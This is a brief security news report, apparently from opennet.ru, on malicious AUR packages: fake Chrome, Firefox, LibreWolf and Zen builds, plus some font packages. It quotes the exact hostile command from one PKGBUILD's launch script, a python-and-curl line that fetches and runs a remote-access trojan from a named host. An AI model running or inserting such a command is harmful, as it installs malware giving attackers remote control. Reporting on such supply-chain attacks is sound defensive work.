In the AUR (Arch User Repository) repository used by Arch Linux To distribute third-party packages, malicious code embedded in unofficial browser builds continued to be published. In addition to the malicious packages firefox-patch-bin, librewolf-fix-bin, and zen-browser-patched-bin discovered two weeks ago, the google-chrome-stable package was added to the AUR, also containing a modification that installs a malicious component that provides remote access to the system.
The PKGBUILD file of the problematic package defined the installation of a script for launching the google-chrome-stable.sh browser, which, among other things, contained the command 'python -c "$(curl https://segs.lol/9wUb1Z)"', which downloaded malware recognized by the VirusTotal service as the Spark Trojan, which allows remote control of the system, launching processes, transferring files, inspecting traffic and sending screenshots.
The malicious package google-chrome-stable was uploaded the day before yesterday and was removed by AUR administrators a few hours after it appeared. Almost immediately after the removal of google-chrome-stable, two malicious packages were uploaded to the AUR - "chrome" and "chrome-bin", containing a similar script for installing malware on the user's system.
Three more packages containing malicious code were then detected: ttf-mac-fonts-all, ttf-ms-fonts-all and gromit.
Source: opennet.ru
